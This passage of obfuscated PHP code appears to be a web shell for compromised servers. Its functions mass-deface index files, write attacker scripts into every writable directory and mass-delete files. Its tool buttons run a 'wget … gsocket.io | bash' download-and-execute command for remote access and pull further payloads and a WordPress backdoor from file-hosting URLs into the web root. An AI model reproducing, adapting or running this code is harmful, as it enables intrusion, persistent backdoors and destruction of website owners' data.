$dirr,$index;chdir($dirr);$me=str_replace(dirname(__FILE__)."\57",'',__FILE__);$files=scandir($dirr);$notallow=array("\56\x68\164\141\x63\143\x65\x73\163","\x77\x77\167","\127\145\142\x2e\103\x6f\156\146\x69\x67","\x55\x4d\x44\x2e\160\150\x70","\x57\145\142\56\x63\x6f\156\x66\x69\147","\167\145\142\56\x63\x6f\x6e\x66\x69\x67","\x77\145\x62\x2e\103\x6f\156\x66\151\x67","\x2e\x2e","\56");sort($files);$n=0;foreach($files as $file){if($file!=$me&&is_dir($file)!=1&&!in_array($file,$notallow)){echo"\x3c\x63\x65\x6e\164\145\x72\76\x3c\123\160\141\x6e\x20\x73\164\171\x6c\x65\x3d\x27\143\x6f\x6c\x6f\x72\72\x20\x23\x38\101\70\101\70\x41\73\47\x3e\74\x73\164\x72\x6f\x6e\147\76{$dirr}\57\x3c\57\x73\160\x61\156\x3e{$file}\74\x2f\163\x74\162\157\x6e\x67\x3e\40\75\x3d\x3d\x3d\76\40";edit_file($file,$index);flush();$n=$n+1;}}echo "\74\x62\x72\x3e";echo"\74\x63\x65\x6e\164\145\162\76\x3c\x62\x72\76\74\x68\63\76{$n}\40\x46\x69\x6c\145\163\x20\104\x65\146\141\143\145\144\x20\x3c\x2f\x68\63\x3e\x3c\x2f\x63\145\x6e\164\x65\162\76\74\142\162\76\40";}function ListFiles($dirrall){if($dh=opendir($dirrall)){$files=array();$inner_files=array();$me=str_replace(dirname(__FILE__)."\x2f",'',__FILE__);$notallow=array($me,"\x2e\x68\x74\x61\143\x63\x65\x73\x73","\x77\167\167","\127\145\x62\x2e\103\157\x6e\146\151\147","\x55\115\104\x2e\x70\150\x70","\x57\x65\x62\x2e\143\157\156\146\x69\x67","\167\145\142\x2e\143\x6f\156\x66\x69\147","\x77\x65\142\x2e\103\x6f\156\x66\x69\x67");while($file=readdir($dh)){if($file!="\x2e"&&$file!="\56\56"&&$file[0]!="\x2e"&&!in_array($file,$notallow)){if(is_dir($dirrall."\57".$file)){$inner_files=ListFiles($dirrall."\x2f".$file);if(is_array($inner_files)){$files=array_merge($files,$inner_files);}}else{array_push($files,$dirrall."\57".$file);}}}closedir($dh);return $files;}}function gass_all(){global $index;$dirrall=$_POST["\x64\137\x64\x69\x72"];foreach(ListFiles($dirrall)as $key=>$file){$file=str_replace("\57\57","\57",$file);echo"\x3c\x63\x65\x6e\164\145\x72\x3e\x3c\163\164\162\157\x6e\147\76{$file}\74\x2f\163\x74\x72\x6f\x6e\147\x3e\40\x3d\x3d\x3d\x3e";edit_file($file,$index);flush();}$key=$key+1;echo"\74\x63\x65\156\164\145\x72\x3e\74\142\162\x3e\74\x68\63\76{$key}\x20\106\x69\154\x65\x73\40\104\145\x66\141\143\145\x64\40\x3c\57\x68\63\x3e\74\57\143\145\156\x74\x65\x72\76\x3c\x62\x72\x3e";}function sabun_Massal($dir,$namafile,$isi_script){if(is_writable($dir)){$dira=scandir($dir);foreach($dira as $dirb){$dirc="{$dir}\x2f{$dirb}";$lokasi=$dirc."\x2f".$namafile;if($dirb==="\x2e"){file_put_contents($lokasi,$isi_script);}elseif($dirb==="\56\56"){file_put_contents($lokasi,$isi_script);}else{if(is_dir($dirc)){if(is_writable($dirc)){echo"\74\x66\157\156\x74\x20\143\x6f\x6c\157\162\x3d\162\145\144\x3e\133\x20\104\x4f\116\105\x20\135\40\74\x2f\x66\157\x6e\x74\76\74\x66\157\156\x74\x20\x63\157\x6c\157\162\x3d\167\x68\151\x74\x65\x3e\40{$lokasi}\74\57\x66\x6f\x6e\x74\x3e\74\x62\162\76";file_put_contents($lokasi,$isi_script);$idx=sabun_Massal($dirc,$namafile,$isi_script);}}}}}}if($_POST["\x4d\141\x73\x73"]=="\x6f\x6e\x65\144\151\x72"){echo "\74\142\x72\x3e\x20\x56\x65\x72\163\x69\x20\124\145\x78\x74\40\101\x72\x65\141\x3c\142\162\x3e\74\x74\145\x78\164\141\162\145\141\x20\x73\x74\171\154\145\75\47\142\x61\143\x6b\147\x72\157\165\156\x64\x3a\x62\x6c\x61\143\153\73\157\x75\x74\x6c\x69\x6e\x65\72\156\157\156\x65\x3b\x63\x6f\x6c\x6f\x72\72\162\x65\x64\73\47\x20\x6e\x61\x6d\x65\75\x27\151\x6e\x64\x65\170\47\40\x72\x6f\167\163\x3d\47\x31\60\47\40\x63\x6f\154\x73\75\47\x36\67\47\76\xa";$ini="\150\164\164\x70\x3a\x2f\57";$mainpath=$_POST[d_dir];$file=$_POST[d_file];$dir=opendir("{$mainpath}");$code=base64_encode($_POST[script]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("{$row}\57{$file}","\167\53");$finish=@fwrite($start,$indx);if($finish){echo"{$ini}{$row}\57{$file}\12";}}echo "\x3c\57\x74\x65\170\x74\141\162\x65\x61\x3e\74\142\162\x3e\x3c\142\162\76\74\142\162\x3e\x3c\x62\x3e\126\x65\x72\x73\x69\x20\124\145\x78\164\x3c\57\142\76\x3c\142\162\x3e\x3c\142\x72\76\x3c\x62\162\76\xa";$mainpath=$_POST[d_dir];$file=$_POST[d_file];$dir=opendir("{$mainpath}");$code=base64_encode($_POST[script]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("{$row}\57{$file}","\167\x2b");$finish=@fwrite($start,$indx);if($finish){echo "\74\141\40\x68\162\x65\146\75\x22\x68\164\164\160\x3a\57\57".$row."\57".$file."\42\40\x74\x61\x72\x67\145\164\75\x22\x5f\x62\x6c\141\156\153\42\x3e\150\x74\x74\160\x3a\x2f\x2f".$row."\57".$file."\x3c\57\141\x3e\x3c\x62\x72\76";}}}elseif($_POST["\115\x61\x73\x73"]=="\x73\x61\x62\165\156\153\141\142\x65\150"){gass();}elseif($_POST["\x4d\141\163\x73"]=="\150\x61\160\x75\x73\115\x61\163\163\141\154"){hapus_Massal($_POST["\144\137\144\151\x72"],$_POST["\144\x5f\146\151\x6c\145"]);}elseif($_POST["\115\x61\x73\163"]=="\x73\141\x62\x75\x6e\x6d\x65\155\x61\x74\151\153\141\156"){gass_all();}elseif($_POST["\115\141\163\163"]=="\x4d\x61\x73\x73\144\x65\x66\141\143\145"){echo "\x3c\x64\x69\x76\40\163\x74\x79\x6c\x65\75\x27\155\x61\x72\x67\x69\x6e\72\x20\x35\x70\170\40\x61\165\164\157\73\40\x70\x61\144\144\x69\x6e\147\x3a\40\x35\x70\170\x27\x3e";sabun_Massal($_POST["\144\137\x64\x69\162"],$_POST["\144\137\146\x69\154\x65"],$_POST["\x73\143\x72\x69\160\x74"]);echo "\74\57\x64\x69\x76\x3e";}else{echo "\x3c\x73\164\x79\154\145\x3e\151\x6e\x70\165\164\133\x74\x79\x70\x65\x3d\163\165\142\155\x69\164\x5d\x2e\x63\165\x73\x74\157\x6d\55\x74\x6f\x6f\x6c\x73\55\142\x75\164\x74\157\156\x73\173\146\x6f\156\164\55\163\151\x7a\145\x3a\61\x34\x70\170\41\151\x6d\x70\x6f\x72\164\141\x6e\164\x3b\160\141\x64\144\x69\x6e\x67\x3a\65\160\x78\40\61\60\160\170\41\x69\x6d\160\157\x72\164\141\x6e\x74\73\x6d\x61\162\x67\x69\x6e\72\x30\40\65\x70\170\x21\151\x6d\160\157\x72\164\141\156\x74\x3b\146\x6f\156\x74\x2d\x77\x65\x69\x67\150\164\x3a\67\60\60\x21\151\x6d\160\x6f\x72\x74\x61\156\x74\73\143\165\x72\163\157\162\x3a\160\x6f\x69\156\164\x65\x72\41\x69\155\x70\x6f\162\164\141\156\x74\73\143\x6f\154\x6f\x72\x3a\x23\145\x31\x65\x31\145\61\x21\x69\155\160\157\x72\x74\x61\x6e\164\x3b\142\x61\143\153\147\162\x6f\165\x6e\144\55\143\x6f\x6c\x6f\x72\72\43\x30\x36\60\x61\61\60\41\151\x6d\160\x6f\x72\164\141\x6e\164\73\x62\157\x72\144\x65\x72\x3a\61\x70\x78\40\x73\x6f\154\151\144\40\43\71\x63\71\70\x32\145\x21\151\x6d\160\157\162\164\141\x6e\x74\x7d\x3c\57\163\x74\x79\x6c\145\76\x3c\x66\157\x6e\x74\40\146\141\x63\145\75\47\x4f\160\x65\156\x20\123\141\x6e\x73\47\40\143\x6f\154\x6f\x72\x3d\47\43\x66\x66\x66\x27\40\163\151\x7a\145\x3d\x27\63\x27\40\76\x53\145\x6c\x65\143\x74\x20\124\171\160\x65\x3a\74\57\x66\157\x6e\x74\x3e\74\x62\x72\76\74\x73\145\154\145\143\x74\x20\143\x6c\x61\163\163\x3d\42\x73\145\154\x65\143\164\x22\40\156\141\155\145\75\42\115\141\163\163\42\x20\40\163\x74\171\x6c\x65\75\x22\167\151\x64\x74\x68\x3a\x20\x33\x30\60\x70\170\73\40\x20\150\145\151\x67\150\x74\75\42\61\x30\42\x20\76\x3c\157\x70\164\x69\157\x6e\x20\x76\x61\154\x75\x65\x3d\x22\x6f\x6e\145\144\151\162\42\x3e\x4d\141\x73\163\x20\104\x65\x66\141\143\x65\40\61\x20\104\151\x72\x3c\57\157\160\x74\x69\x6f\x6e\x3e\11\74\157\160\x74\151\x6f\x6e\x20\166\141\154\165\x65\75\42\115\x61\x73\163\144\145\x66\x61\x63\x65\42\76\115\x61\163\x73\40\x44\x65\146\x61\143\x65\40\101\114\114\40\104\151\162\x3c\57\157\160\164\x69\x6f\x6e\x3e\x3c\x6f\x70\x74\151\x6f\x6e\40\x76\x61\x6c\165\x65\75\x22\163\141\142\x75\x6e\153\141\x62\x65\x68\42\x3e\x43\x75\x72\x72\x65\x6e\164\x20\104\151\x72\x20\101\x6c\x6c\x20\106\151\x6c\x65\163\x3c\57\x6f\x70\x74\x69\x6f\x6e\76\11\x3c\x6f\160\164\151\x6f\156\x20\166\141\x6c\165\145\x3d\x22\163\141\142\165\156\x6d\x65\155\141\164\x69\153\x61\x6e\42\x3e\x52\145\x70\154\141\143\x65\40\105\166\x65\x72\171\x74\150\x69\x6e\x67\40\x57\x69\x74\x68\40\x44\145\146\141\x63\x65\74\x2f\x6f\160\x74\x69\157\156\x3e\x3c\x6f\160\164\151\x6f\156\x20\x76\141\x6c\x75\x65\75\x22\x68\141\160\x75\163\x4d\x61\163\x73\141\x6c\42\76\x4d\x61\163\163\x20\x44\145\x6c\x65\164\x65\40\106\151\154\x65\163\74\57\x6f\160\164\x69\157\156\x3e\74\x2f\163\145\154\145\143\x74\76\74\142\162\76\74\x66\x6f\156\164\x20\146\141\143\145\x3d\x27\117\160\x65\156\x20\123\141\156\x73\x27\x20\x63\157\x6c\157\162\x3d\47\x23\146\146\146\47\x20\x73\151\172\x65\75\47\63\x27\x20\76\106\157\154\x64\x65\x72\72\74\57\x66\x6f\x6e\164\76\x3c\x62\x72\76\74\x69\156\x70\165\x74\x20\x6e\141\x6d\x65\75\x27\144\x5f\x64\151\x72\47\40\x76\141\x6c\x75\x65\75\47".getcwd()."\x27\40\x72\145\x71\165\x69\x72\145\x64\x3d\47\x27\40\164\x79\x70\145\75\x27\x74\145\x78\164\x27\x20\x73\164\171\154\x65\x3d\47\x77\x69\144\164\x68\72\40\x33\x30\x30\160\170\73\x20\40\x68\145\x69\x67\150\x74\75\47\x31\60\47\76\74\x62\x72\76\74\146\x6f\x6e\164\x20\x66\141\x63\145\x3d\47\x4f\160\145\x6e\x20\123\141\x6e\163\x27\x20\x63\x6f\x6c\x6f\x72\75\x27\43\x66\x66\x66\x27\40\163\x69\x7a\x65\x3d\47\63\47\x20\x3e\x46\151\154\145\x6e\x61\155\x65\x3a\74\x2f\x66\x6f\156\x74\76\74\x62\162\x3e\x3c\x69\x6e\x70\165\164\40\x74\171\160\x65\75\47\x74\x65\x78\164\x27\40\x6e\141\x6d\x65\75\47\144\137\x66\x69\x6c\x65\47\x20\166\x61\154\165\145\x3d\x27\151\x6e\144\145\170\56\x68\x74\x6d\x6c\47\40\163\x74\171\x6c\x65\x3d\x27\x77\151\144\164\x68\x3a\x20\x33\x30\x30\x70\x78\x3b\40\40\x68\x65\x69\x67\x68\x74\75\47\61\60\x27\x3e\x3c\x62\x72\76\74\146\157\156\164\x20\146\x61\x63\145\x3d\x27\x4f\x70\x65\x6e\x20\x53\x61\156\163\x27\x20\x63\157\x6c\x6f\x72\75\47\43\146\x66\146\47\163\x69\x7a\x65\x3d\47\63\47\40\76\151\x6e\144\145\170\x20\106\x69\x6c\145\72\74\x2f\146\157\x6e\x74\x3e\74\142\x72\76\12\x3c\164\145\170\x74\141\x72\x65\x61\40\156\141\155\145\x3d\x27\x73\143\x72\151\160\x74\x27\40\x73\164\171\x6c\x65\x3d\x27\x77\x69\x64\x74\x68\x3a\x20\x36\x35\60\160\x78\73\40\x68\x65\x69\x67\150\164\72\40\x32\x30\60\x70\x78\x3b\x27\76\74\57\x74\x65\170\x74\x61\162\x65\141\x3e\74\142\162\x3e\12\x3c\x69\x6e\160\165\164\40\x74\171\x70\x65\x3d\x27\x73\165\142\x6d\x69\x74\x27\40\x63\x6c\141\163\163\x3d\47\143\165\x73\164\157\x6d\55\x74\157\x6f\154\163\x2d\142\x75\164\x74\157\x6e\x73\x27\40\156\141\155\x65\x3d\47\x73\164\141\x72\x74\47\x20\166\141\154\x75\x65\x3d\x27\x4d\x61\x73\163\40\x44\x65\x66\x61\143\x65\47\76\x3c\x2f\146\157\162\x6d\x3e\74\x2f\144\151\166\x3e";}die;}goto ayxVY;cnbni:function hardFooter(){echo "\x3c\144\x69\x76\x20\x73\x74\x79\154\145\x3d\42\155\141\x72\x67\151\x6e\72\x33\60\x70\170\x20\x32\60\160\170\x3b\x22\76";echo "\74\x66\x6f\x72\155\40\x6d\145\x74\x68\x6f\144\x3d\42\160\x6f\x73\x74\x22\76";echo "\74\164\141\142\154\145\x20\x73\x74\171\x6c\x65\75\142\141\x63\x6b\147\x72\x6f\165\x6e\x64\72\x23\62\x31\x32\x38\63\x32\x21\x69\x6d\x70\x6f\162\x74\141\156\x74\73\x20\143\154\x61\x73\x73\x3d\151\x6e\146\x6f\x20\x69\144\x3d\164\x6f\157\x6c\x73\124\x62\x6c\40\143\145\x6c\154\x70\x61\144\144\x69\x6e\x67\x3d\63\40\143\145\x6c\154\163\x70\141\143\151\156\147\x3d\x30\x20\x77\x69\144\164\x68\x3d\x31\60\60\45\76";echo "\74\164\150\145\141\144\76\x3c\x63\145\156\164\145\x72\76\x3c\x68\63\x3e\x3c\x73\x74\162\x6f\x6e\x67\76\103\165\163\164\157\155\40\124\157\157\154\x73\x3c\57\x73\x74\x72\157\x6e\x67\76\74\57\x68\63\x3e\x3c\x2f\143\x65\156\164\x65\x72\76\74\x2f\164\x68\x65\x61\x64\x3e";echo "\74\164\x62\x6f\144\171\76";echo "\74\x74\162\76\74\164\144\76";echo "\x3c\151\156\x70\x75\164\x20\143\x6c\141\163\163\75\x22\143\x75\163\x74\x6f\x6d\x2d\x74\x6f\157\154\x73\x2d\x62\x75\x74\x74\157\x6e\x73\x22\40\x74\x79\160\x65\75\42\163\x75\142\155\x69\164\x22\40\x6e\141\155\x65\75\42\x72\x75\x6e\147\163\42\40\x76\x61\x6c\x75\x65\75\42\x47\x53\x22\x3e";echo "\x3c\x69\156\160\x75\x74\40\x63\154\x61\163\163\75\x22\143\165\x73\164\157\x6d\55\x74\x6f\157\x6c\x73\55\142\165\x74\x74\x6f\156\163\42\40\x74\171\160\x65\x3d\x22\163\165\x62\155\x69\164\x22\x20\x6e\x61\155\145\x3d\x22\x72\165\156\x67\x73\143\42\x20\x76\x61\x6c\165\145\x3d\x22\107\x53\x43\x22\76";echo "\74\x69\x6e\160\x75\x74\40\143\154\x61\163\x73\75\42\x63\x75\163\x74\x6f\155\x2d\164\x6f\x6f\x6c\163\55\x62\x75\164\164\157\x6e\x73\x22\x20\x74\171\160\x65\75\x22\163\x75\142\155\151\x74\42\x20\156\x61\x6d\145\75\42\x74\x65\x62\x61\162\167\160\x22\40\x76\141\x6c\165\145\x3d\x22\127\120\x20\102\x44\x22\x3e";echo "\x3c\x69\156\x70\x75\164\x20\143\154\141\x73\x73\x3d\x22\143\165\x73\x74\x6f\155\x2d\x74\157\157\154\163\55\x62\165\164\164\157\156\x73\42\x20\x74\171\160\x65\x3d\42\163\165\142\155\x69\164\x22\40\x6e\141\155\x65\75\42\151\x6e\x6a\x65\143\x74\x75\160\154\157\x61\x64\x65\162\x22\40\x76\x61\154\x75\x65\75\42\x55\x70\x6c\157\141\x64\x65\x72\x22\76";echo "\74\x69\156\x70\x75\164\x20\143\x6c\x61\163\x73\75\42\143\165\x73\x74\x6f\x6d\55\164\x6f\x6f\154\x73\55\142\x75\164\164\x6f\x6e\x73\42\40\164\171\x70\x65\x3d\42\163\x75\x62\155\151\x74\42\x20\156\141\x6d\145\75\42\x69\x6e\x6a\145\143\x74\143\x6f\x6e\163\157\x6c\145\42\x20\166\x61\154\165\x65\x3d\42\x43\157\156\x73\x6f\x6c\145\42\x3e";echo "\74\x69\156\x70\x75\164\x20\143\154\x61\x73\163\75\42\x63\165\163\x74\x6f\x6d\x2d\164\157\x6f\x6c\x73\55\142\165\164\x74\x6f\156\163\42\x20\164\171\x70\x65\x3d\x22\x73\165\142\155\x69\x74\x22\x20\156\x61\155\x65\75\x22\151\x6e\152\145\x63\164\154\157\147\147\x65\162\42\x20\x76\141\x6c\165\145\x3d\x22\x4c\157\x67\147\x65\162\42\x3e";echo "\x3c\57\x74\162\x3e\x3c\57\164\x64\x3e";echo "\x3c\x2f\x74\x62\x6f\x64\171\x3e";echo "\x3c\x2f\164\x61\142\x6c\x65\76";echo "\x3c\x2f\x66\157\x72\x6d\x3e";echo "\x3c\144\x69\x76\x20\163\164\x79\154\145\75\42\x6d\x61\x72\x67\x69\156\x3a\x33\x30\160\x78\x20\x32\x30\160\x78\73\x22\76";if(isset($_POST["\162\165\156\147\x73"])){echo"\74\144\x69\x76\40\x63\154\141\163\x73\75\x22\142\151\x67\141\x72\145\x61\x22\40\x6e\141\155\145\x3d\42\157\165\x74\x70\x75\164\42\40\163\164\171\154\145\x3d\x22\142\157\162\144\x65\x72\55\142\x6f\164\x74\x6f\155\72\60\x3b\155\x61\162\x67\151\156\x2d\x74\157\160\x3a\x35\160\x78\73\x22\40\162\x65\141\x64\x6f\x6e\x6c\x79\x3e\74\x70\x72\145\x20\x63\154\x61\163\163\75\155\154\x31\76{$asciifnc7}".ex("\142\x61\x73\150\40\55\143\x20\x22\x24\50\x77\x67\x65\x74\40\55\55\156\x6f\x2d\x63\x68\x65\x63\153\55\x63\x65\x72\164\x69\146\151\x63\141\164\x65\x20\55\x71\117\x2d\x20\x67\163\157\x63\x6b\145\x74\56\151\x6f\57\x78\x29\x22")."\74\x2f\160\162\x65\76\74\57\144\x69\x76\76";}if(isset($_POST["\x72\x75\156\x67\x73\x63"])){$url="\150\x74\x74\x70\x73\72\x2f\x2f\162\x65\163\x2e\x63\x6c\157\x75\144\151\x6e\141\162\171\x2e\143\157\155\x2f\x64\x62\x61\163\x73\145\x74\x73\x2f\162\x61\167\57\165\x70\154\x6f\141\144\x2f\166\61\x36\65\x30\65\x37\62\60\x37\70\x2f\164\157\x6f\154\57\147\157\x6f\x67\x6c\x65\x33\146\x34\145\65\70\x64\x37\142\67\65\x35\x32\x62\60\60\x5f\152\x6e\161\70\165\x68\x2e\x74\170\x74";$startDirectory=realpath(__DIR__);if($startDirectory!==$_SERVER["\x44\117\x43\125\115\x45\x4e\124\137\x52\117\x4f\x54"]){$gschtml=$startDirectory."\x2f\x67\157\x6f\147\x6c\x65\63\x66\x34\x65\65\x38\144\67\x62\x37\x35\65\62\142\60\60\x2e\x68\x74\155\154";}else{$gschtml=$_SERVER["\104\117\103\125\x4d\x45\x4e\124\x5f\122\117\117\124"]."\x2f\147\157\x6f\147\154\x65\63\146\x34\145\65\x38\x64\67\x62\x37\x35\x35\62\x62\60\x30\56\150\164\x6d\x6c";}if(!file_exists($gschtml)){if(ini_get("\x61\154\154\157\x77\137\165\162\154\137\x66\x6f\160\x65\156")){$content=file_get_contents($url);$status=file_put_contents($gschtml,$content);if($status){echo "\74\144\151\166\40\143\154\x61\x73\x73\75\x22\163\x6d\141\x6c\154\42\x20\x6e\x61\155\145\75\42\x6f\165\x74\160\165\164\x22\40\x73\x74\x79\x6c\x65\x3d\42\x62\157\162\144\x65\x72\55\142\157\164\x74\157\x6d\72\60\x3b\155\x61\162\147\151\x6e\x2d\164\157\160\x3a\x35\x70\170\x3b\x22\x20\x72\145\x61\x64\x6f\x6e\154\x79\76\x3c\163\x70\141\156\x20\x73\164\171\x6c\145\75\143\157\154\x6f\162\x3a\x23\62\60\x65\x66\62\60\41\x69\x6d\160\x6f\x72\164\x61\x6e\x74\73\146\157\x6e\164\55\167\x65\151\x67\x68\164\72\142\157\154\144\x3b\x3e\102\x65\x72\150\x61\163\x69\154\40\x55\x70\154\x6f\141\x64\40\106\x69\154\x65\40\107\123\103\41\x3c\57\x73\160\141\x6e\76\74\57\x64\x69\166\76";chmod($gschtml,292);}else{echo "\74\x64\151\x76\40\x63\x6c\141\x73\163\75\42\163\x6d\x61\154\154\42\40\x6e\x61\x6d\145\x3d\x22\157\x75\164\160\x75\164\42\x20\163\164\171\x6c\145\75\x22\x62\157\x72\x64\145\162\55\142\x6f\x74\x74\x6f\x6d\x3a\x30\73\155\141\x72\147\x69\156\55\x74\x6f\160\x3a\65\x70\x78\73\42\x20\162\145\x61\x64\157\x6e\154\171\x3e\x3c\x73\x70\x61\156\40\163\164\171\154\x65\75\143\x6f\154\x6f\162\72\162\145\x64\41\151\x6d\160\157\162\x74\x61\x6e\164\73\x66\x6f\156\164\x2d\167\x65\x69\147\x68\x74\72\142\x6f\x6c\x64\x3b\76\x43\141\156\47\x74\40\x44\157\x77\156\x6c\x6f\x61\144\40\x47\123\x43\40\106\151\x6c\x65\41\x3c\x2f\163\x70\141\x6e\76\74\x2f\144\151\166\76";}}else{$fp=fopen($gschtml,"\x77\x2b");$ch=curl_init($url);curl_setopt($ch,CURLOPT_FILE,$fp);curl_exec($ch);$st_code=curl_getinfo($ch,CURLINFO_HTTP_CODE);curl_close($ch);fclose($fp);if($st_code==200){echo "\74\x64\151\166\40\143\x6c\141\x73\x73\75\x22\163\155\x61\x6c\x6c\x22\x20\x6e\141\155\x65\75\42\157\165\164\x70\165\164\42\x20\x73\164\x79\154\145\x3d\x22\142\x6f\x72\x64\x65\162\55\142\x6f\x74\164\157\155\x3a\x30\73\x6d\x61\162\x67\151\156\x2d\x74\157\160\x3a\65\x70\x78\73\42\40\162\145\141\x64\x6f\x6e\154\x79\76\74\163\160\x61\x6e\40\163\164\171\x6c\145\x3d\x63\x6f\154\157\162\72\43\x32\60\145\x66\x32\60\41\151\155\x70\x6f\162\164\141\156\164\x3b\146\x6f\x6e\164\55\x77\145\151\x67\150\164\72\x62\157\x6c\144\73\x3e\x42\145\162\150\x61\x73\151\154\40\x55\160\x6c\157\141\x64\40\106\x69\x6c\145\x20\107\x53\103\41\74\57\x73\x70\141\156\x3e\x3c\57\x64\x69\166\x3e";chmod($gschtml,292);}else{echo "\x3c\x64\x69\166\40\x63\x6c\x61\163\x73\75\42\x73\x6d\141\x6c\154\42\x20\x6e\141\x6d\145\75\42\x6f\165\x74\160\165\x74\x22\x20\x73\x74\171\154\145\75\42\x62\157\x72\x64\145\162\55\x62\157\x74\x74\x6f\155\72\x30\x3b\x6d\141\162\x67\x69\156\x2d\x74\157\x70\72\65\x70\x78\73\42\40\x72\145\141\x64\157\x6e\154\x79\76\74\x73\160\141\156\40\x73\164\x79\x6c\x65\x3d\x63\157\x6c\157\162\x3a\162\145\x64\41\x69\x6d\160\157\x72\164\x61\x6e\x74\73\146\x6f\156\164\x2d\x77\145\x69\x67\x68\x74\72\x62\x6f\154\144\x3b\76\103\141\x6e\x27\164\40\104\157\167\156\154\157\141\144\40\107\123\x43\x20\x46\151\x6c\x65\41\x3c\x2f\163\160\x61\x6e\x3e\74\x2f\x64\x69\166\76";}}}else{echo "\x3c\144\x69\x76\40\x63\154\141\x73\163\x3d\42\x73\155\141\x6c\154\x22\x20\x6e\x61\x6d\145\75\x22\157\x75\164\160\x75\x74\42\40\163\164\x79\154\x65\x3d\x22\x62\157\162\144\145\x72\55\142\x6f\x74\164\x6f\x6d\72\x30\73\155\141\162\147\151\x6e\55\x74\157\160\72\65\160\170\73\42\40\x72\x65\x61\x64\x6f\x6e\x6c\171\76\x3c\x73\x70\141\156\x20\x73\x74\171\154\x65\x3d\x63\157\154\x6f\x72\72\43\x32\x30\145\146\x32\60\x21\151\155\160\157\162\164\x61\x6e\x74\x3b\146\x6f\x6e\164\55\x77\x65\x69\147\150\164\x3a\142\157\154\x64\73\76\106\151\x6c\145\x20\x47\123\103\40\x55\144\x61\150\x20\101\x64\x61\x21\x3c\x2f\x73\160\141\x6e\x3e\74\57\x64\151\166\76";}}if(isset($_POST["\164\x65\142\x61\x72\x77\x70"])){$current_url=(isset($_SERVER["\110\124\x54\120\x53"])&&$_SERVER["\x48\124\124\x50\123"]==="\x6f\156"?"\150\164\x74\x70\163":"\150\164\x74\x70")."\72\x2f\57{$_SERVER["\x48\124\x54\x50\137\x48\117\123\x54"]}{$_SERVER["\122\x45\121\125\105\x53\124\x5f\125\x52\x49"]}";$root_url=parse_url($current_url);$home=$root_url["\163\x63\x68\x65\x6d\x65"]."\72\57\x2f".$root_url["\x68\157\x73\x74"]."\57";if(ob_get_level()==0){ob_start();}echo str_pad('',4096)."\12";$startDirectory=realpath(__DIR__);$b1="\x68\164\164\x70\x73\x3a\x2f\57\162\x65\x73\56\x63\x6c\157\x75\x64\151\156\x61\x72\171\x2e\143\157\x6d\x2f\144\142\141\x73\163\145\x74\x73\x2f\162\x61\x77\57\x75\x70\154\x6f\x61\144\57\166\61\x36\x35\x30\65\x36\67\70\x33\71\x2f\164\x6f\157\154\57\x61\154\x66\x31\x5f\x73\153\x70\x6b\x6d\x7a\56\164\x78\x74";$b2="\x68\x74\x74\160\x73\x3a\57\57\x72\x65\163\56\x63\x6c\x6f\x75\144\x69\156\141\x72\171\x2e\x63\x6f\x6d\x2f\144\x62\x61\163\x73\145\164\163\x2f\162\141\167\57\165\x70\x6c\157\141\144\x2f\x76\61\x36\x35\x30\65\66\x37\x38\x39\63\x2f\164\157\157\x6c\x2f\x61\154\146\62\x5f\x62\x39\x6b\x70\x64\70\x2e\x74\170\164";$b3="\x68\x74\x74\160\x73\72\57\x2f\162\x65\x73\x2e\x63\154\x6f\x75\x64\151\x6e\x61\162\171\56\x63\x6f\155\x2f\x64\x62\x61\x73\x73\x65\164\x73\x2f\x72\x61\167\57\165\160\x6c\157\x61\144\x2f\x76\x31\x36\65\x30\x35\66\67\71\x33\60\57\164\x6f\157\154\57\141\154\146\63\x5f\147\170\65\x76\152\x6f\x2e\164\x78\164";$b4="\x68\x74\x74\x70\x73\x3a\57\x2f\162\145\x73\x2e\143\154\x6f\165\144\151\x6e\141\x72\x79\56\x63\157\155\57\x64\142\x61\163\163\x65\x74\x73\57\162\141\167\x2f\x75\160\x6c\157\x61\144\57\x76\x31\66\x35\x30\x35\66\70\x32\62\x38\57\x74\157\157\154\57\x61\x6c\x66\64\137\164\x65\x6f\153\x65\x76\x2e\x74\x78\x74";$b5="\150\x74\164\160\x73\x3a\x2f\x2f\162\x65\163\56\x63\x6c\157\x75\144\151\156\x61\x72\x79\x2e\x63\x6f\155\x2f\x64\x62\x61\x73\x73\145\164\x73\57\162\141\167\x2f\165\x70\x6c\157\141\x64\57\x76\x31\66\65\x30\65\x36\x38\x32\x34\x35\x2f\x74\157\x6f\154\57\x61\154\146\65\137\x62\x68\166\x6b\x6c\155\56\164\x78\x74";$b6="\150\x74\x74\160\163\x3a\57\x2f\x72\x65\163\56\143\154\x6f\165\x64\151\156\x61\x72\x79\x2e\143\157\155\57\144\x62\141\x73\x73\145\164\163\x2f\x72\141\167\57\165\x70\154\157\141\x64\57\x76\61\x36\x35\x30\x35\x36\70\62\x36\61\57\x74\x6f\157\x6c\57\141\x6c\x66\66\137\x69\165\162\143\x72\166\56\x74\170\164";$b7="\150\164\164\x70\x73\x3a\57\57\163\x6e\151\160\x70\x65\x74\56\x68\157\163\x74\x2f\x70\x77\x78\x79\x2f\162\x61\x77";$b8="\150\164\164\160\163\x3a\x2f\x2f\162\x65\x73\56\143\154\x6f\165\x64\x69\156\141\162\x79\56\143\x6f\155\57\x64\x62\141\x73\163\x65\x74\163\x2f\x72\x61\167\x2f\x75\160\x6c\x6f\141\144\x2f\166\x31\x36\x35\60\65\x36\71\65\x34\60\x2f\x74\157\x6f\x6c\x2f\x77\163\153\141\x67\x61\x6d\151\137\142\167\x6b\x78\155\x77\56\164\x78\164";$b9="\x68\x74\x74\x70\x73\72\x2f\x2f\162\145\163\x2e\x63\154\x6f\165\144\x69\156\x61\162\x79\x2e\143\x6f\x6d\57\144\142\141\163\163\145\x74\x73\57\162\141\x77\57\165\x70\154\x6f\141\144\57\166\x31\66\65\60\65\x37\x31\x30\66\x35\x2f\164\x6f\157\x6c\x2f\165\x70\154\157\141\144\x65\x72\137\x62\146\x7a\x65\x68\x66\56\x74\x78\164";$b10="\x68\x74\x74\x70\x73\x3a\57\57\144\x70\141\x73\x74\x65\56\x63\x6f\x6d\57\102\125\102\123\103\62\131\70\x32\56\164\170\x74";$b11="\x68\x74\x74\x70\x73\x3a\x2f\x2f\163\x6e\151\x70\x70\145\x74\x2e\150\157\x73\164\57\172\x67\163\166\57\162\141\167";$b12="\150\x74\164\x70\163\x3a\57\57\x72\145\163\56\x63\x6c\157\165\144\x69\x6e\141\162\x79\x2e\x63\x6f\155\57\144\x62\x61\163\x73\145\x74\x73\57\162\141\167\x2f\165\160\x6c\157\141\x64\x2f\x76\x31\66\65\60\65\66\67\x38\x33\